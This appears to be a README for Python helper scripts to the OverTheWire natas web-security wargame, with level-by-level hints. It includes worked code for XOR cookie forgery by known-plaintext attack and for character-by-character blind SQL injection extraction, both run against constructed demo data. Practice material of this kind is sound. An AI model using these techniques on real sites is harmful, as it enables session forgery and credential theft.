Helper scripts and writeups for the natas challenges hosted by OverTheWire
All scripts have been written in Python 3.6.
The primary goal of this repository is to show how to use Python in CTF challenges. That's why the passwords are not written in the credentials file: at least try the scripts!
There is a plethora of specialized libraries and frameworks for penetration testing, but for didactic purposes we will use only Python's standard library.
The file natas.json contains the credentials for each level, and the scripts automatically read the correct ones. As you progress, write the flags you find there. Each script can be run on its own, without any third-party dependency.
Here you will learn how to make a basic HTTP request with HTTP Basic authentication and how to fetch the result.
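The request described above, written with nothing but the standard library. This is an added illustration, not one of the repository's scripts; it assumes the level URL layout http://natasN.natas.labs.overthewire.org/ that OverTheWire documents and builds the Authorization header by hand so you can see what urllib's HTTPBasicAuthHandler would otherwise do for you after a 401 challenge. The optional `extra_headers` argument is there because later levels need a Referer or Cookie header on top of the credentials.

```python
import base64
import urllib.request

# URL layout of the natas levels (N is the level number).
BASE_URL = "http://natas{level}.natas.labs.overthewire.org/"


def basic_auth_header(username, password):
    """Value of an HTTP Basic 'Authorization' header (RFC 7617):
    the scheme name followed by base64("user:pass")."""
    token = base64.b64encode(f"{username}:{password}".encode("utf-8"))
    return "Basic " + token.decode("ascii")


def build_request(level, username, password, path="", extra_headers=None):
    """Prepare a urllib Request for a natas level, sending the credentials
    pre-emptively so we do not pay for the 401 round trip."""
    req = urllib.request.Request(BASE_URL.format(level=level) + path)
    req.add_header("Authorization", basic_auth_header(username, password))
    # Later levels need extra headers such as Referer or Cookie.
    for name, value in (extra_headers or {}).items():
        req.add_header(name, value)
    return req


def fetch(req, timeout=10):
    """Send the request and return the response body as text."""
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return resp.read().decode(charset, errors="replace")


if __name__ == "__main__":
    # Needs network access. natas0 is the public entry level: user and
    # password are both "natas0".
    print(fetch(build_request(0, "natas0", "natas0")))
```

Read the credentials from natas.json rather than hard-coding them; only natas0's password is public.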
Apparently natas0 was meant to be done in a GUI web browser, because this challenge is exactly the same, but right-click has been disabled.
Here you will learn how to list directories and inspect their contents.
One of the comments in the source hints at a robots.txt file. Using what you have learned, you will be able to figure out how to navigate the site and extract the password from a file.
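Navigating a site from a script means parsing what the server gives back. The following is an added example, not code from the repository: a standard-library HTML parser that pulls the entries out of an Apache-style directory index, and a small robots.txt reader that returns the Disallow paths, which are usually the ones worth visiting. The sample index page and robots.txt are constructed for the example; the base URL is hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin


class LinkExtractor(HTMLParser):
    """Collect href targets from an HTML page such as an Apache index."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)


def list_directory(html, base_url):
    """Absolute URLs of the entries in a directory listing.

    Column-sort links (href starting with '?') and anything that does not
    resolve below base_url (the 'Parent Directory' link) are dropped.
    """
    parser = LinkExtractor()
    parser.feed(html)
    entries = []
    for href in parser.links:
        if href.startswith("?"):
            continue
        url = urljoin(base_url, href)
        if url.startswith(base_url) and url != base_url:
            entries.append(url)
    return entries


def disallowed_paths(robots_txt):
    """Disallow entries of a robots.txt, comments stripped."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()
        if line.lower().startswith("disallow:"):
            path = line.split(":", 1)[1].strip()
            if path:
                paths.append(path)
    return paths


# Constructed sample data so the example runs offline.
SAMPLE_INDEX = """<html><head><title>Index of /files</title></head><body>
<h1>Index of /files</h1>
<table>
<tr><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th></tr>
<tr><td><a href="/">Parent Directory</a></td></tr>
<tr><td><a href="notes.txt">notes.txt</a></td></tr>
<tr><td><a href="secret/">secret/</a></td></tr>
</table></body></html>"""

SAMPLE_ROBOTS = """User-agent: *
Disallow: /s3cr3t/   # constructed entry
Disallow:
Allow: /
"""

if __name__ == "__main__":
    for url in list_directory(SAMPLE_INDEX, "http://example.test/files/"):
        print(url)
    print(disallowed_paths(SAMPLE_ROBOTS))
```

In a real run you would feed the body returned by your authenticated fetch into these functions and recurse into every entry that ends with a slash.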
The site checks which page the request came from by means of the Referer header. Use this to your advantage.
In this challenge you will have to manipulate a cookie to continue.
Use what you learned to inspect the included PHP files.
Use the hints in the code to perform a Local File Inclusion (LFI).
Look for the encoded secret and the function that generates it. You will get familiar with base64 and hexadecimal conversions.
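Whatever the exact encoder turns out to be, the approach is the same: if every step is invertible, the decoder is the inverse steps applied in reverse order. The block below is an added example, not the repository's solution, and the encoding chain it uses (base64-encode, reverse the string, hex-encode, i.e. the PHP pipeline `bin2hex(strrev(base64_encode($secret)))`) is an assumption chosen for illustration. The PHP-to-Python correspondence it relies on is: base64_encode is `base64.b64encode`, strrev is a reversed slice, bin2hex is `binascii.hexlify`.

```python
import base64
import binascii
from functools import reduce

# Assumed example chain (see lead-in): base64 -> reverse -> hex.
ENCODE_STEPS = (base64.b64encode, lambda b: b[::-1], binascii.hexlify)
# The inverse: each step's inverse, in the opposite order.
DECODE_STEPS = (binascii.unhexlify, lambda b: b[::-1], base64.b64decode)


def apply_chain(data, steps):
    """Run `data` (bytes) through `steps` left to right."""
    return reduce(lambda acc, step: step(acc), steps, data)


def encode_secret(secret):
    """bytes -> hex string, mirroring the assumed PHP encoder."""
    return apply_chain(secret, ENCODE_STEPS).decode("ascii")


def decode_secret(encoded):
    """Inverse of encode_secret: hex string -> original bytes."""
    return apply_chain(encoded.encode("ascii"), DECODE_STEPS)


if __name__ == "__main__":
    # Constructed value, not a real natas secret.
    encoded = encode_secret(b"hi")
    print(encoded, decode_secret(encoded))
```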
Here you will face a pretty obvious case of command injection.
Similar to the previous challenge, but you will have to get around a sloppy input validation.
This is a classic case of predictable encryption: the default value of the cookie is known plaintext, and you can use it to find the pattern in the encryption algorithm.
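The known-plaintext attack in code. This is an added example, not the repository's script, and it assumes the cipher is a repeating-key XOR whose output is base64-encoded into the cookie; the key and the default cookie contents are constructed for the demo. XOR is its own inverse, so ciphertext XOR known plaintext yields the key stream, and the key is the shortest repeating unit of that stream. Once the key is known, any plaintext can be encrypted into a cookie the site will accept.

```python
import base64


def xor_bytes(data, key):
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_cookie(plaintext, key):
    """Assumed cookie format for the example: base64(plaintext XOR key)."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode("ascii")


def decrypt_cookie(cookie, key):
    return xor_bytes(base64.b64decode(cookie), key)


def shortest_period(stream):
    """Length of the shortest unit whose repetition reproduces `stream`."""
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return period
    return len(stream)


def recover_key(cookie, known_plaintext):
    """Known-plaintext attack: ciphertext XOR plaintext gives the key
    stream, and the key is its shortest repeating unit.

    Caveat: this needs known plaintext at least as long as the key; with
    less data the detected period may be shorter than the real key.
    """
    ciphertext = base64.b64decode(cookie)
    n = min(len(ciphertext), len(known_plaintext))
    key_stream = xor_bytes(ciphertext[:n], known_plaintext[:n])
    return key_stream[:shortest_period(key_stream)]


def forge_cookie(default_cookie, default_plaintext, wanted_plaintext):
    """Recover the key from the cookie the site handed out and re-encrypt
    a plaintext of our choosing with it."""
    key = recover_key(default_cookie, default_plaintext)
    return encrypt_cookie(wanted_plaintext, key)


if __name__ == "__main__":
    # Constructed demo: the key is the site's secret, the default plaintext
    # is known to us because the site's source shows it.
    key = b"k3y!"
    default_plaintext = b'{"theme":"dark","admin":"no"}'
    default_cookie = encrypt_cookie(default_plaintext, key)
    forged = forge_cookie(default_cookie, default_plaintext,
                          b'{"theme":"dark","admin":"yes"}')
    print(decrypt_cookie(forged, key))
```

If the recovered key looks wrong, the first thing to check is the period detection: print the whole key stream and look for the repetition by eye.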
In this challenge the uploaded file is not being validated at all. Use it to your advantage.
Now the file type is checked, but this is not enough to stop you, or is it?
SQL Injection 101
Another SQL injection, where you will have to use conditionals to guess the password letter by letter.
Knowing that the value of one of the fields can be executed is key.
Blind SQL injection. Here the only hint is the processing time of the request.
A poorly designed session ID assignment that can be brute-forced.
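The letter-by-letter extraction behind both the conditional and the time-based blind injections above, as an added example that is not part of the repository. The extraction loop only needs a yes/no oracle for "does the secret start with this prefix?"; the two levels differ solely in how that answer is observed (a marker string in the page versus a slow response), so the same loop is driven by two small adapters. The SQL fragment, the response marker, the password alphabet and the fake site used to run it offline are all assumptions made for the example; MySQL syntax is assumed for the condition.

```python
import string
import time

# Assumption for the example: the secret only contains letters and digits.
CHARSET = string.ascii_letters + string.digits


def sql_prefix_condition(prefix):
    """Hypothetical condition to splice into a vulnerable query (MySQL
    syntax assumed): true when the password starts with `prefix`.
    LIKE BINARY makes the comparison case-sensitive. The prefix is
    restricted to CHARSET so no LIKE wildcard or quote needs escaping."""
    if any(ch not in CHARSET for ch in prefix):
        raise ValueError("prefix contains characters outside CHARSET")
    return f'password LIKE BINARY "{prefix}%"'


def boolean_oracle(send, marker):
    """Wrap a request function into a True/False oracle: the page contains
    `marker` only when the injected condition held."""
    return lambda prefix: marker in send(prefix)


def timing_oracle(send, threshold):
    """Same contract, but the signal is response time (e.g. the condition
    triggers SLEEP()). `threshold` is in seconds and should sit well above
    the normal latency of the page."""
    def oracle(prefix):
        start = time.monotonic()
        send(prefix)
        return time.monotonic() - start >= threshold
    return oracle


def extract_secret(oracle, max_length=32, charset=CHARSET):
    """Recover a secret one character at a time.

    `oracle(prefix)` returns True when the secret starts with `prefix`.
    Each position tries every candidate character; when none extends the
    current prefix the secret is complete.
    """
    found = ""
    while len(found) < max_length:
        for ch in charset:
            if oracle(found + ch):
                found += ch
                break
        else:
            return found
    return found


def make_fake_site(secret, delay=0.0):
    """Constructed stand-in for the vulnerable page so the example runs
    offline: behaves like a query whose WHERE clause contains
    sql_prefix_condition(prefix), optionally sleeping when it matches."""
    def send(prefix):
        if secret.startswith(prefix):
            time.sleep(delay)
            return "<p>This user exists.</p>"
        return "<p>This user doesn't exist.</p>"
    return send


if __name__ == "__main__":
    site = make_fake_site("aB3z")
    print(extract_secret(boolean_oracle(site, "This user exists")))
    slow_site = make_fake_site("x9", delay=0.2)
    print(extract_secret(timing_oracle(slow_site, 0.1)))
```

Against a real target, `send` builds the injected parameter from `sql_prefix_condition(prefix)` and issues the authenticated request; keep the timing threshold generous and re-check a recovered character when the answer is borderline, since network jitter is the main source of wrong guesses.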
Another version of the prior challenge.
Yet another version of the same challenge.
Another weak session ID generator, but this time the vulnerability is not in the main page, making this a sort of side-channel exploitation.
The page in this challenge keeps redirecting us somewhere else to distract us from its flaws.
In this challenge you will see how to exploit weak typing in PHP.
Here the backend seems to be implemented in C, and inspecting the man pages of certain string-handling functions will give you the hints you need.
This one is fun. You will have to bypass several basic input validations to build up to an LFI.
Object deserialization can be used to inject code in PHP too.
Use a truncation issue in SQL to bypass some control conditions.
Remember the predictable session IDs? Weak encryption algorithms are exactly as bad.
In this challenge you will have your first contact with vulnerable Perl calls.
There is a way to bypass Perl's quote() function.
This is a complex challenge. You will have to look up the CCC presentations titled "The Perl Jam", which explain why Perl is not a suitable language for the web.
There is a Perl script that will execute whatever you give it as an argument.
There is a way to exploit the PHP function md5_file().